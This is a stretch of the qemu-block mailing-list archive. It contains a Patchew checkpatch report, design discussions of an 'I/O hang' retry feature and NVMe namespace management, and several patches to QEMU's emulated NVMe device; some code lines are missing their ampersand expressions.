476911f nvme: bump supported NVMe revision to 1.3d
5856e28 nvme: add missing mandatory Features
c1555e1 nvme: support Get Log Page command
36411fc nvme: support Asynchronous Event Request command
c27295f nvme: refactor device realization
9b85297 nvme: support Abort command
b4752ee nvme: support completion queue in cmb
cecb502 nvme: populate the mandatory subnqn and ver fields
01283a3 nvme: add missing fields in identify controller
c8dcb3f nvme: fix lpa field
4515446 nvme: move device parameters to separate struct
9f1a140 nvme: simplify namespace code

=== OUTPUT BEGIN ===
1/16 Checking commit 9f1a1408cc38 (nvme: simplify namespace code)
2/16 Checking commit 451544667fc8 (nvme: move device parameters to separate 
struct)
ERROR: Macros with complex values should be enclosed in parenthesis
#204: FILE: hw/block/nvme.h:6:
+#define DEFINE_NVME_PROPERTIES(_state, _props) \
+DEFINE_PROP_STRING("serial", _state, _props.serial), \
+DEFINE_PROP_UINT32("cmb_size_mb", _state, _props.cmb_size_mb, 0), \
+DEFINE_PROP_UINT32("num_queues", _state, _props.num_queues, 64)

total: 1 errors, 0 warnings, 205 lines checked

Patch 2/16 has style problems, please review.  If any of these errors
are false positives report them to the maintainer, see
CHECKPATCH in MAINTAINERS.

3/16 Checking commit c8dcb3f63fb7 (nvme: fix lpa field)
4/16 Checking commit 01283a3975d7 (nvme: add missing fields in identify 
controller)
5/16 Checking commit cecb50298f9f (nvme: populate the mandatory subnqn and ver 
fields)
6/16 Checking commit b4752eecf9e1 (nvme: support completion queue in cmb)
7/16 Checking commit 9b8529736294 (nvme: support Abort command)
8/16 Checking commit c27295f1ea55 (nvme: refactor device realization)
9/16 Checking commit 36411fcd1a67 (nvme: support Asynchronous Event Request 
command)
10/16 Checking commit c1555e1835da (nvme: support Get Log Page command)
11/16 Checking commit 5856e2876e3c (nvme: add missing mandatory Features)
12/16 Checking commit 476911f6ca42 (nvme: bump supported NVMe revision to 1.3d)
13/16 Checking commit a093729af080 (nvme: simplify dma/cmb mappings)
14/16 Checking commit 87ed48569f6f (nvme: support multiple block requests per 
request)
15/16 Checking commit 124aba558277 (nvme: support scatter gather lists)
16/16 Checking commit aed82e6e8f62 (nvme: support multiple namespaces)
WARNING: added, moved or deleted file(s), does MAINTAINERS need updating?
#39: 
new file mode 100644

total: 0 errors, 1 warnings, 631 lines checked

Patch 16/16 has style problems, please review.  If any of these errors
are false positives report them to the maintainer, see
CHECKPATCH in MAINTAINERS.
=== OUTPUT END ===

Test command exited with code: 1


The full log is available at
http://patchew.org/logs/20190705072333.17171-1-kl...@birkelund.eu/testing.checkpatch/?type=message.
---
Email generated automatically by Patchew [https://patchew.org/].
Please send your feedback to patchew-de...@redhat.com

Re: [Qemu-block] question：about introduce a new feature named “I/O hang”

2019-07-05 Thread Kevin Wolf

Am 04.07.2019 um 17:16 hat wangjie (P) geschrieben:
> Hi, everybody：
> 
> I developed a feature named "I/O hang"，my intention is to solve the problem
> like that：
> If the backend storage media of VM disk is far-end storage like IPSAN or
> FCSAN, storage net link will always disconnection and
> make I/O requests return EIO to Guest, and the status of filesystem in Guest
> will be read-only, even the link recovered
> after a while, the status of filesystem in Guest will not recover.

The standard solution for this is configuring the guest device with
werror=stop,rerror=stop so that the error is not delivered to the guest,
but the VM is stopped. When you run 'cont', the request is then retried.

> So I developed a feature named "I/O hang" to solve this problem, the
> solution like that：
> when some I/O requests return EIO in backend, "I/O hang" will catch the
> requests in qemu block layer and
> insert the requests to a rehandle queue but not return EIO to Guest, the I/O
> requests in Guest will hang but it does not lead
> Guest filesystem to be read-only, then "I/O hang" will loop to rehandle the
> requests for a period time(ex. 5 second) until the requests
> not return EIO(when backend storage link recovered).

Letting requests hang without stopping the VM risks the guest running
into timeouts and deciding that its disk is broken.

As you say your "hang" and retry logic sits in the block layer, what do
you do when you encounter a bdrv_drain() request?

> In addition to the function as above, "I/O hang" also can sent event to
> libvirt after backend storage status changed.
> 
> configure methods:
> 1. "I/O hang" ability can be configured for each disk as a disk attribute.
> 2. "I/O hang" timeout value also can be configured for each disk, when
> storage link not recover in timeout value,
>    "I/O hang" will disable rehandle I/O requests and return EIO to Guest.
> 
> Are you interested in the feature?  I intend to push this feature to qemu
> org, what's your opinion?

Were you aware of werror/rerror? Before we add another mechanism, we
need to be sure how the features compare, that the new mechanism
provides a significant advantage and that we keep code duplication as
low as possible.

Kevin

Re: [Qemu-block] [RFC,v1] Namespace Management Support

2019-07-05 Thread Klaus Birkelund

On Tue, Jul 02, 2019 at 10:39:36AM -0700, Matt Fitzpatrick wrote:
> Adding namespace management support to the nvme device. Namespace creation
> requires contiguous block space for a simple method of allocation.
> 
> I wrote this a few years ago based on Keith's fork and nvmeqemu fork and
> have recently re-synced with the latest trunk.  Some data structures in
> nvme.h are a bit more filled out that strictly necessary as this is also the
> base for sr-iov and IOD patched to be submitted later.
> 

Hi Matt,

Nice! I'm always happy when new features for the nvme device is posted!

I'll be happy to review it, but I won't start going through it in
details because I believe the approach to supporting multiple namespaces
is flawed. We had a recent discussion on this and I also got some
unrelated patches rejected due to implementing it similarly by carving
up the image.

I have posted a long series that includes a patch for multiple
namespaces. It is implemented by introducing a fresh `nvme-ns` device
model that represents a namespace and attaches to a bus created by the
parent `nvme` controller device.

The core issue is that a qemu image /should/ be attachable to other
devices (say ide) and not strictly tied to the one device model. Thus,
we cannot just shove a bunch of namespaces into a single image.

But, in light of your patch, I'm not convinced that my implementation is
the correct solution. Maybe the abstraction should not be an `nvme-ns`
device, but a `nvme-nvm` device that when attached changes TNVMCAP and
UNVMCAP? Maybe you have some input for this? Or we could have both and
dynamically create the nvme-ns devices on top of nvme-nvm devices. I
think it would still require a 1-to-1 mapping, but it could be a way to
support the namespace management capability.

Cheers,
Klaus

[Qemu-block] [PATCH 12/16] nvme: bump supported NVMe revision to 1.3d

2019-07-05 Thread Klaus Birkelund Jensen

Add the new Namespace Identification Descriptor List (CNS 03h) and track
creation of queues to enable the controller to return Command Sequence
Error if Set Features is called for Number of Queues after any queues
have been created.

Signed-off-by: Klaus Birkelund Jensen 
---
 hw/block/nvme.c   | 84 ---
 hw/block/nvme.h   |  1 +
 hw/block/trace-events |  4 ++-
 include/block/nvme.h  | 30 +---
 4 files changed, 102 insertions(+), 17 deletions(-)

diff --git a/hw/block/nvme.c b/hw/block/nvme.c
index 8259dd7c1d6c..8ad95fdfa261 100644
--- a/hw/block/nvme.c
+++ b/hw/block/nvme.c
@@ -9,20 +9,22 @@
  */
 
 /**
- * Reference Specs: http://www.nvmexpress.org, 1.2, 1.1, 1.0e
+ * Reference Specs: http://www.nvmexpress.org, 1.3d, 1.2, 1.1, 1.0e
  *
  *  http://www.nvmexpress.org/resources/
  */
 
 /**
  * Usage: add options:
- *  -drive file=,if=none,id=
- *  -device nvme,drive=,serial=,id=, \
- *  cmb_size_mb=, \
- *  num_queues=
+ * -drive file=,if=none,id=
+ * -device nvme,drive=,serial=,id=
  *
- * Note cmb_size_mb denotes size of CMB in MB. CMB is assumed to be at
- * offset 0 in BAR2 and supports only WDS, RDS and SQS for now.
+ * Advanced optional options:
+ *
+ *   num_queues=  : Maximum number of IO Queues.
+ *  Default: 64
+ *   cmb_size_mb= : Size of Controller Memory Buffer in MBs.
+ *  Default: 0 (disabled)
  */
 
 #include "qemu/osdep.h"
@@ -43,6 +45,7 @@
 #define NVME_ELPE 3
 #define NVME_AERL 3
 #define NVME_OP_ABORTED 0xff
+
 #define NVME_GUEST_ERR(trace, fmt, ...) \
 do { \
 (trace_##trace)(__VA_ARGS__); \
@@ -316,6 +319,8 @@ static void nvme_post_cqes(void *opaque)
 static void nvme_enqueue_req_completion(NvmeCQueue *cq, NvmeRequest *req)
 {
 assert(cq->cqid == req->sq->cqid);
+
+trace_nvme_enqueue_req_completion(req->cqe.cid, cq->cqid);
 QTAILQ_REMOVE(>sq->out_req_list, req, entry);
 QTAILQ_INSERT_TAIL(>req_list, req, entry);
 timer_mod(cq->timer, qemu_clock_get_ns(QEMU_CLOCK_VIRTUAL) + 500);
@@ -534,6 +539,7 @@ static void nvme_free_sq(NvmeSQueue *sq, NvmeCtrl *n)
 if (sq->sqid) {
 g_free(sq);
 }
+n->qs_created--;
 }
 
 static uint16_t nvme_del_sq(NvmeCtrl *n, NvmeCmd *cmd)
@@ -600,6 +606,7 @@ static void nvme_init_sq(NvmeSQueue *sq, NvmeCtrl *n, 
uint64_t dma_addr,
 cq = n->cq[cqid];
 QTAILQ_INSERT_TAIL(&(cq->sq_list), sq, entry);
 n->sq[sqid] = sq;
+n->qs_created++;
 }
 
 static uint16_t nvme_create_sq(NvmeCtrl *n, NvmeCmd *cmd)
@@ -649,6 +656,7 @@ static void nvme_free_cq(NvmeCQueue *cq, NvmeCtrl *n)
 if (cq->cqid) {
 g_free(cq);
 }
+n->qs_created--;
 }
 
 static uint16_t nvme_del_cq(NvmeCtrl *n, NvmeCmd *cmd)
@@ -689,6 +697,7 @@ static void nvme_init_cq(NvmeCQueue *cq, NvmeCtrl *n, 
uint64_t dma_addr,
 msix_vector_use(>parent_obj, cq->vector);
 n->cq[cqid] = cq;
 cq->timer = timer_new_ns(QEMU_CLOCK_VIRTUAL, nvme_post_cqes, cq);
+n->qs_created++;
 }
 
 static uint16_t nvme_create_cq(NvmeCtrl *n, NvmeCmd *cmd)
@@ -762,7 +771,7 @@ static uint16_t nvme_identify_ns(NvmeCtrl *n, NvmeIdentify 
*c)
 prp1, prp2);
 }
 
-static uint16_t nvme_identify_nslist(NvmeCtrl *n, NvmeIdentify *c)
+static uint16_t nvme_identify_ns_list(NvmeCtrl *n, NvmeIdentify *c)
 {
 static const int data_len = 4 * KiB;
 uint32_t min_nsid = le32_to_cpu(c->nsid);
@@ -772,7 +781,7 @@ static uint16_t nvme_identify_nslist(NvmeCtrl *n, 
NvmeIdentify *c)
 uint16_t ret;
 int i, j = 0;
 
-trace_nvme_identify_nslist(min_nsid);
+trace_nvme_identify_ns_list(min_nsid);
 
 list = g_malloc0(data_len);
 for (i = 0; i < n->num_namespaces; i++) {
@@ -789,6 +798,47 @@ static uint16_t nvme_identify_nslist(NvmeCtrl *n, 
NvmeIdentify *c)
 return ret;
 }
 
+static uint16_t nvme_identify_ns_descriptor_list(NvmeCtrl *n, NvmeCmd *c)
+{
+static const int data_len = 4 * KiB;
+
+/*
+ * The device model does not have anywhere to store a persistent UUID, so
+ * conjure up something that is reproducible. We generate an UUID of the
+ * form "----", where nsid is similar to, say,
+ * 0001.
+ */
+struct ns_descr {
+uint8_t nidt;
+uint8_t nidl;
+uint8_t rsvd[14];
+uint32_t nid;
+};
+
+uint32_t nsid = le32_to_cpu(c->nsid);
+uint64_t prp1 = le64_to_cpu(c->prp1);
+uint64_t prp2 = le64_to_cpu(c->prp2);
+
+struct ns_descr *list;
+uint16_t ret;
+
+trace_nvme_identify_ns_descriptor_list(nsid);
+
+if (unlikely(nsid == 0 || nsid > n->num_namespaces)) {
+trace_nvme_err_invalid_ns(nsid, n->num_namespaces);
+return NVME_INVALID_NSID | NVME_DNR;
+}
+
+list = g_malloc0(data_len);
+list->nidt = 0x3;
+list->nidl = 0x10;
+list->nid = cpu_to_be32(nsid);
+
+ret = nvme_dma_read_prp(n, (uint8_t *) list, data_len,

[Qemu-block] [PATCH 14/16] nvme: support multiple block requests per request

2019-07-05 Thread Klaus Birkelund Jensen

Currently, the device only issues a single block backend request per
NVMe request, but as we move towards supporting metadata (and
discontiguous vector requests supported by OpenChannel 2.0) it will be
required to issue multiple block backend requests per NVMe request.

With this patch the NVMe device is ready for that.

Signed-off-by: Klaus Birkelund Jensen 
---
 hw/block/nvme.c   | 322 --
 hw/block/nvme.h   |  49 +--
 hw/block/trace-events |   3 +
 3 files changed, 290 insertions(+), 84 deletions(-)

diff --git a/hw/block/nvme.c b/hw/block/nvme.c
index 02888dbfdbc1..b285119fd29a 100644
--- a/hw/block/nvme.c
+++ b/hw/block/nvme.c
@@ -25,6 +25,8 @@
  *  Default: 64
  *   cmb_size_mb= : Size of Controller Memory Buffer in MBs.
  *  Default: 0 (disabled)
+ *   mdts= : Maximum Data Transfer Size (power of two)
+ *  Default: 7
  */
 
 #include "qemu/osdep.h"
@@ -319,10 +321,9 @@ static uint16_t nvme_dma_write_prp(NvmeCtrl *n, uint8_t 
*ptr, uint32_t len,
 static uint16_t nvme_dma_read_prp(NvmeCtrl *n, uint8_t *ptr, uint32_t len,
 uint64_t prp1, uint64_t prp2, NvmeRequest *req)
 {
-QEMUSGList qsg;
 uint16_t err = NVME_SUCCESS;
 
-err = nvme_map_prp(n, , prp1, prp2, len, req);
+err = nvme_map_prp(n, >qsg, prp1, prp2, len, req);
 if (err) {
 return err;
 }
@@ -330,8 +331,8 @@ static uint16_t nvme_dma_read_prp(NvmeCtrl *n, uint8_t 
*ptr, uint32_t len,
 if (req->is_cmb) {
 QEMUIOVector iov;
 
-qemu_iovec_init(, qsg.nsg);
-dma_to_cmb(n, , );
+qemu_iovec_init(, req->qsg.nsg);
+dma_to_cmb(n, >qsg, );
 
 if (unlikely(qemu_iovec_from_buf(, 0, ptr, len) != len)) {
 trace_nvme_err_invalid_dma();
@@ -343,17 +344,86 @@ static uint16_t nvme_dma_read_prp(NvmeCtrl *n, uint8_t 
*ptr, uint32_t len,
 goto out;
 }
 
-if (unlikely(dma_buf_read(ptr, len, ))) {
+if (unlikely(dma_buf_read(ptr, len, >qsg))) {
 trace_nvme_err_invalid_dma();
 err = NVME_INVALID_FIELD | NVME_DNR;
 }
 
 out:
-qemu_sglist_destroy();
+qemu_sglist_destroy(>qsg);
 
 return err;
 }
 
+static void nvme_blk_req_destroy(NvmeBlockBackendRequest *blk_req)
+{
+if (blk_req->iov.nalloc) {
+qemu_iovec_destroy(_req->iov);
+}
+
+g_free(blk_req);
+}
+
+static void nvme_blk_req_put(NvmeCtrl *n, NvmeBlockBackendRequest *blk_req)
+{
+nvme_blk_req_destroy(blk_req);
+}
+
+static NvmeBlockBackendRequest *nvme_blk_req_get(NvmeCtrl *n, NvmeRequest *req,
+QEMUSGList *qsg)
+{
+NvmeBlockBackendRequest *blk_req = g_malloc0(sizeof(*blk_req));
+
+blk_req->req = req;
+
+if (qsg) {
+blk_req->qsg = qsg;
+}
+
+return blk_req;
+}
+
+static uint16_t nvme_blk_setup(NvmeCtrl *n, NvmeNamespace *ns, QEMUSGList *qsg,
+NvmeRequest *req)
+{
+NvmeBlockBackendRequest *blk_req = nvme_blk_req_get(n, req, qsg);
+if (!blk_req) {
+NVME_GUEST_ERR(nvme_err_internal_dev_error, "nvme_blk_req_get: %s",
+"could not allocate memory");
+return NVME_INTERNAL_DEV_ERROR;
+}
+
+blk_req->slba = req->slba;
+blk_req->nlb = req->nlb;
+blk_req->blk_offset = req->slba * nvme_ns_lbads_bytes(ns);
+
+QTAILQ_INSERT_TAIL(>blk_req_tailq, blk_req, tailq_entry);
+
+return NVME_SUCCESS;
+}
+
+static uint16_t nvme_blk_map(NvmeCtrl *n, NvmeCmd *cmd, NvmeRequest *req)
+{
+NvmeNamespace *ns = req->ns;
+uint16_t err;
+
+uint32_t len = req->nlb * nvme_ns_lbads_bytes(ns);
+uint64_t prp1 = le64_to_cpu(cmd->prp1);
+uint64_t prp2 = le64_to_cpu(cmd->prp2);
+
+err = nvme_map_prp(n, >qsg, prp1, prp2, len, req);
+if (err) {
+return err;
+}
+
+err = nvme_blk_setup(n, ns, >qsg, req);
+if (err) {
+return err;
+}
+
+return NVME_SUCCESS;
+}
+
 static void nvme_post_cqes(void *opaque)
 {
 NvmeCQueue *cq = opaque;
@@ -388,6 +458,10 @@ static void nvme_enqueue_req_completion(NvmeCQueue *cq, 
NvmeRequest *req)
 {
 assert(cq->cqid == req->sq->cqid);
 
+if (req->qsg.nalloc) {
+qemu_sglist_destroy(>qsg);
+}
+
 trace_nvme_enqueue_req_completion(req->cqe.cid, cq->cqid);
 QTAILQ_REMOVE(>sq->out_req_list, req, entry);
 QTAILQ_INSERT_TAIL(>req_list, req, entry);
@@ -471,130 +545,224 @@ static void nvme_process_aers(void *opaque)
 
 static void nvme_rw_cb(void *opaque, int ret)
 {
-NvmeRequest *req = opaque;
+NvmeBlockBackendRequest *blk_req = opaque;
+NvmeRequest *req = blk_req->req;
 NvmeSQueue *sq = req->sq;
 NvmeCtrl *n = sq->ctrl;
 NvmeCQueue *cq = n->cq[sq->cqid];
 
+QTAILQ_REMOVE(>blk_req_tailq, blk_req, tailq_entry);
+
+trace_nvme_rw_cb(req->cqe.cid, req->cmd.nsid);
+
 if (!ret) {
-block_acct_done(blk_get_stats(n->conf.blk), >acct);
-req->status = NVME_SUCCESS;
+

[Qemu-block] [PATCH 16/16] nvme: support multiple namespaces

2019-07-05 Thread Klaus Birkelund Jensen

This adds support for multiple namespaces by introducing a new 'nvme-ns'
device model. The nvme device creates a bus named from the device name
('id'). The nvme-ns devices then connect to this and registers
themselves with the nvme device.

This changes how an nvme device is created. Example with two namespaces:

  -drive file=nvme0n1.img,if=none,id=disk1
  -drive file=nvme0n2.img,if=none,id=disk2
  -device nvme,serial=deadbeef,id=nvme0
  -device nvme-ns,drive=disk1,bus=nvme0,nsid=1
  -device nvme-ns,drive=disk2,bus=nvme0,nsid=2

A maximum of 256 namespaces can be configured.

Signed-off-by: Klaus Birkelund Jensen 
---
 hw/block/Makefile.objs |   2 +-
 hw/block/nvme-ns.c | 139 +
 hw/block/nvme-ns.h |  35 +
 hw/block/nvme.c| 169 -
 hw/block/nvme.h|  29 ---
 hw/block/trace-events  |   1 +
 6 files changed, 255 insertions(+), 120 deletions(-)
 create mode 100644 hw/block/nvme-ns.c
 create mode 100644 hw/block/nvme-ns.h

diff --git a/hw/block/Makefile.objs b/hw/block/Makefile.objs
index f5f643f0cc06..d44a2f4b780d 100644
--- a/hw/block/Makefile.objs
+++ b/hw/block/Makefile.objs
@@ -7,7 +7,7 @@ common-obj-$(CONFIG_PFLASH_CFI02) += pflash_cfi02.o
 common-obj-$(CONFIG_XEN) += xen-block.o
 common-obj-$(CONFIG_ECC) += ecc.o
 common-obj-$(CONFIG_ONENAND) += onenand.o
-common-obj-$(CONFIG_NVME_PCI) += nvme.o
+common-obj-$(CONFIG_NVME_PCI) += nvme.o nvme-ns.o
 
 obj-$(CONFIG_SH4) += tc58128.o
 
diff --git a/hw/block/nvme-ns.c b/hw/block/nvme-ns.c
new file mode 100644
index ..11b594467991
--- /dev/null
+++ b/hw/block/nvme-ns.c
@@ -0,0 +1,139 @@
+#include "qemu/osdep.h"
+#include "qemu/units.h"
+#include "qemu/cutils.h"
+#include "qemu/log.h"
+#include "hw/block/block.h"
+#include "hw/pci/msix.h"
+#include "sysemu/sysemu.h"
+#include "sysemu/block-backend.h"
+#include "qapi/error.h"
+
+#include "hw/qdev-core.h"
+
+#include "nvme.h"
+#include "nvme-ns.h"
+
+static uint64_t nvme_ns_calc_blks(NvmeNamespace *ns)
+{
+return ns->size / nvme_ns_lbads_bytes(ns);
+}
+
+static void nvme_ns_init_identify(NvmeIdNs *id_ns)
+{
+id_ns->lbaf[0].ds = BDRV_SECTOR_BITS;
+}
+
+static int nvme_ns_init(NvmeNamespace *ns)
+{
+uint64_t ns_blks;
+NvmeIdNs *id_ns = >id_ns;
+
+nvme_ns_init_identify(id_ns);
+
+ns_blks = nvme_ns_calc_blks(ns);
+id_ns->nuse = id_ns->ncap = id_ns->nsze = cpu_to_le64(ns_blks);
+
+return 0;
+}
+
+static int nvme_ns_init_blk(NvmeNamespace *ns, NvmeIdCtrl *id, Error **errp)
+{
+blkconf_blocksizes(>conf);
+
+if (!blkconf_apply_backend_options(>conf,
+blk_is_read_only(ns->conf.blk), false, errp)) {
+return 1;
+}
+
+ns->size = blk_getlength(ns->conf.blk);
+if (ns->size < 0) {
+error_setg_errno(errp, -ns->size, "blk_getlength");
+return 1;
+}
+
+if (!blk_enable_write_cache(ns->conf.blk)) {
+id->vwc = 0;
+}
+
+return 0;
+}
+
+static int nvme_ns_check_constraints(NvmeNamespace *ns, Error **errp)
+{
+if (!ns->conf.blk) {
+error_setg(errp, "nvme-ns: block backend not configured");
+return 1;
+}
+
+return 0;
+}
+
+
+static void nvme_ns_realize(DeviceState *dev, Error **errp)
+{
+NvmeNamespace *ns = NVME_NS(dev);
+BusState *s = qdev_get_parent_bus(dev);
+NvmeCtrl *n = NVME(s->parent);
+Error *local_err = NULL;
+
+if (nvme_ns_check_constraints(ns, _err)) {
+error_propagate_prepend(errp, local_err,
+"nvme_ns_check_constraints: ");
+return;
+}
+
+if (nvme_ns_init_blk(ns, >id_ctrl, _err)) {
+error_propagate_prepend(errp, local_err, "nvme_ns_init_blk: ");
+return;
+}
+
+nvme_ns_init(ns);
+if (nvme_register_namespace(n, ns, _err)) {
+error_propagate_prepend(errp, local_err, "nvme_register_namespace: ");
+return;
+}
+}
+
+static Property nvme_ns_props[] = {
+DEFINE_BLOCK_PROPERTIES(NvmeNamespace, conf),
+DEFINE_NVME_NS_PROPERTIES(NvmeNamespace, params),
+DEFINE_PROP_END_OF_LIST(),
+};
+
+static void nvme_ns_class_init(ObjectClass *oc, void *data)
+{
+DeviceClass *dc = DEVICE_CLASS(oc);
+
+set_bit(DEVICE_CATEGORY_STORAGE, dc->categories);
+
+dc->bus_type = TYPE_NVME_BUS;
+dc->realize = nvme_ns_realize;
+dc->props = nvme_ns_props;
+dc->desc = "virtual nvme namespace";
+}
+
+static void nvme_ns_instance_init(Object *obj)
+{
+NvmeNamespace *ns = NVME_NS(obj);
+char *bootindex = g_strdup_printf("/namespace@%d,0", ns->params.nsid);
+
+device_add_bootindex_property(obj, >conf.bootindex, "bootindex",
+bootindex, DEVICE(obj), _abort);
+
+g_free(bootindex);
+}
+
+static const TypeInfo nvme_ns_info = {
+.name = TYPE_NVME_NS,
+.parent = TYPE_DEVICE,
+.class_init = nvme_ns_class_init,
+.instance_size = sizeof(NvmeNamespace),
+.instance_init = nvme_ns_instance_init,
+};
+
+static void nvme_ns_register_types(void)
+{
+

[Qemu-block] [PATCH 13/16] nvme: simplify dma/cmb mappings

2019-07-05 Thread Klaus Birkelund Jensen

Instead of handling both QSGs and IOVs in multiple places, simply use
QSGs everywhere by assuming that the request does not involve the
controller memory buffer (CMB). If the request is found to involve the
CMB, convert the QSG to an IOV and issue the I/O. The QSG is converted
to an IOV by the dma helpers anyway, so the CMB path is not unfairly
affected by this simplifying change.

As a side-effect, this patch also allows PRPs to be located in the CMB.
The logic ensures that if some of the PRP is in the CMB, all of it must
be located there.

Signed-off-by: Klaus Birkelund Jensen 
---
 hw/block/nvme.c   | 277 --
 hw/block/nvme.h   |   3 +-
 hw/block/trace-events |   1 +
 include/block/nvme.h  |   1 +
 4 files changed, 187 insertions(+), 95 deletions(-)

diff --git a/hw/block/nvme.c b/hw/block/nvme.c
index 8ad95fdfa261..02888dbfdbc1 100644
--- a/hw/block/nvme.c
+++ b/hw/block/nvme.c
@@ -55,14 +55,21 @@
 
 static void nvme_process_sq(void *opaque);
 
+static inline uint8_t nvme_addr_is_cmb(NvmeCtrl *n, hwaddr addr)
+{
+return n->cmbsz && addr >= n->ctrl_mem.addr &&
+addr < (n->ctrl_mem.addr + int128_get64(n->ctrl_mem.size));
+}
+
 static void nvme_addr_read(NvmeCtrl *n, hwaddr addr, void *buf, int size)
 {
-if (n->cmbsz && addr >= n->ctrl_mem.addr &&
-addr < (n->ctrl_mem.addr + int128_get64(n->ctrl_mem.size))) {
+if (nvme_addr_is_cmb(n, addr)) {
 memcpy(buf, (void *)>cmbuf[addr - n->ctrl_mem.addr], size);
-} else {
-pci_dma_read(>parent_obj, addr, buf, size);
+
+return;
 }
+
+pci_dma_read(>parent_obj, addr, buf, size);
 }
 
 static void nvme_addr_write(NvmeCtrl *n, hwaddr addr, void *buf, int size)
@@ -151,139 +158,200 @@ static void nvme_irq_deassert(NvmeCtrl *n, NvmeCQueue 
*cq)
 }
 }
 
-static uint16_t nvme_map_prp(QEMUSGList *qsg, QEMUIOVector *iov, uint64_t prp1,
- uint64_t prp2, uint32_t len, NvmeCtrl *n)
+static uint16_t nvme_map_prp(NvmeCtrl *n, QEMUSGList *qsg, uint64_t prp1,
+uint64_t prp2, uint32_t len, NvmeRequest *req)
 {
 hwaddr trans_len = n->page_size - (prp1 % n->page_size);
 trans_len = MIN(len, trans_len);
 int num_prps = (len >> n->page_bits) + 1;
+uint16_t status = NVME_SUCCESS;
+bool prp_list_in_cmb = false;
+
+trace_nvme_map_prp(req->cmd.opcode, trans_len, len, prp1, prp2, num_prps);
 
 if (unlikely(!prp1)) {
 trace_nvme_err_invalid_prp();
 return NVME_INVALID_FIELD | NVME_DNR;
-} else if (n->cmbsz && prp1 >= n->ctrl_mem.addr &&
-   prp1 < n->ctrl_mem.addr + int128_get64(n->ctrl_mem.size)) {
-qsg->nsg = 0;
-qemu_iovec_init(iov, num_prps);
-qemu_iovec_add(iov, (void *)>cmbuf[prp1 - n->ctrl_mem.addr], 
trans_len);
-} else {
-pci_dma_sglist_init(qsg, >parent_obj, num_prps);
-qemu_sglist_add(qsg, prp1, trans_len);
 }
+
+if (nvme_addr_is_cmb(n, prp1)) {
+req->is_cmb = true;
+}
+
+pci_dma_sglist_init(qsg, >parent_obj, num_prps);
+qemu_sglist_add(qsg, prp1, trans_len);
+
 len -= trans_len;
 if (len) {
 if (unlikely(!prp2)) {
 trace_nvme_err_invalid_prp2_missing();
+status = NVME_INVALID_FIELD | NVME_DNR;
 goto unmap;
 }
+
 if (len > n->page_size) {
 uint64_t prp_list[n->max_prp_ents];
 uint32_t nents, prp_trans;
 int i = 0;
 
+if (nvme_addr_is_cmb(n, prp2)) {
+prp_list_in_cmb = true;
+}
+
 nents = (len + n->page_size - 1) >> n->page_bits;
 prp_trans = MIN(n->max_prp_ents, nents) * sizeof(uint64_t);
-nvme_addr_read(n, prp2, (void *)prp_list, prp_trans);
+nvme_addr_read(n, prp2, (void *) prp_list, prp_trans);
 while (len != 0) {
+bool addr_is_cmb;
 uint64_t prp_ent = le64_to_cpu(prp_list[i]);
 
 if (i == n->max_prp_ents - 1 && len > n->page_size) {
 if (unlikely(!prp_ent || prp_ent & (n->page_size - 1))) {
 trace_nvme_err_invalid_prplist_ent(prp_ent);
+status = NVME_INVALID_FIELD | NVME_DNR;
+goto unmap;
+}
+
+addr_is_cmb = nvme_addr_is_cmb(n, prp_ent);
+if ((prp_list_in_cmb && !addr_is_cmb) ||
+(!prp_list_in_cmb && addr_is_cmb)) {
+status = NVME_INVALID_USE_OF_CMB | NVME_DNR;
 goto unmap;
 }
 
 i = 0;
 nents = (len + n->page_size - 1) >> n->page_bits;
 prp_trans = MIN(n->max_prp_ents, nents) * sizeof(uint64_t);
-nvme_addr_read(n, prp_ent, (void *)prp_list,
-prp_trans);
+nvme_addr_read(n, prp_ent, (void

[Qemu-block] [PATCH 09/16] nvme: support Asynchronous Event Request command

2019-07-05 Thread Klaus Birkelund Jensen

Required for compliance with NVMe revision 1.2.1. See NVM Express 1.2.1,
Section 5.2 ("Asynchronous Event Request command").

Modified from Keith's qemu-nvme tree.

Signed-off-by: Klaus Birkelund Jensen 
---
 hw/block/nvme.c   | 88 ++-
 hw/block/nvme.h   |  7 
 hw/block/trace-events |  7 
 3 files changed, 100 insertions(+), 2 deletions(-)

diff --git a/hw/block/nvme.c b/hw/block/nvme.c
index eb6af6508e2d..a20576654f1b 100644
--- a/hw/block/nvme.c
+++ b/hw/block/nvme.c
@@ -39,6 +39,7 @@
 #include "nvme.h"
 
 #define NVME_MAX_QS PCI_MSIX_FLAGS_QSIZE
+#define NVME_AERL 3
 #define NVME_OP_ABORTED 0xff
 #define NVME_GUEST_ERR(trace, fmt, ...) \
 do { \
@@ -318,6 +319,51 @@ static void nvme_enqueue_req_completion(NvmeCQueue *cq, 
NvmeRequest *req)
 timer_mod(cq->timer, qemu_clock_get_ns(QEMU_CLOCK_VIRTUAL) + 500);
 }
 
+static void nvme_process_aers(void *opaque)
+{
+NvmeCtrl *n = opaque;
+NvmeRequest *req;
+NvmeAerResult *result;
+NvmeAsyncEvent *event, *next;
+
+trace_nvme_process_aers();
+
+QSIMPLEQ_FOREACH_SAFE(event, >aer_queue, entry, next) {
+/* can't post cqe if there is nothing to complete */
+if (!n->outstanding_aers) {
+trace_nvme_no_outstanding_aers();
+break;
+}
+
+/* ignore if masked (cqe posted, but event not cleared) */
+if (n->aer_mask & (1 << event->result.event_type)) {
+trace_nvme_aer_masked(event->result.event_type, n->aer_mask);
+continue;
+}
+
+QSIMPLEQ_REMOVE_HEAD(>aer_queue, entry);
+
+n->aer_mask |= 1 << event->result.event_type;
+n->aer_mask_queued &= ~(1 << event->result.event_type);
+n->outstanding_aers--;
+
+req = n->aer_reqs[n->outstanding_aers];
+
+result = (NvmeAerResult *) >cqe.result;
+result->event_type = event->result.event_type;
+result->event_info = event->result.event_info;
+result->log_page = event->result.log_page;
+g_free(event);
+
+req->status = NVME_SUCCESS;
+
+trace_nvme_aer_post_cqe(result->event_type, result->event_info,
+result->log_page);
+
+nvme_enqueue_req_completion(>admin_cq, req);
+}
+}
+
 static void nvme_rw_cb(void *opaque, int ret)
 {
 NvmeRequest *req = opaque;
@@ -796,6 +842,8 @@ static uint16_t nvme_get_feature(NvmeCtrl *n, NvmeCmd *cmd, 
NvmeRequest *req)
 break;
 case NVME_TIMESTAMP:
 return nvme_get_feature_timestamp(n, cmd);
+case NVME_ASYNCHRONOUS_EVENT_CONF:
+result = cpu_to_le32(n->features.async_config);
 break;
 default:
 trace_nvme_err_invalid_getfeat(dw10);
@@ -841,11 +889,11 @@ static uint16_t nvme_set_feature(NvmeCtrl *n, NvmeCmd 
*cmd, NvmeRequest *req)
 req->cqe.result = cpu_to_le32((n->params.num_queues - 2) |
 ((n->params.num_queues - 2) << 16));
 break;
-
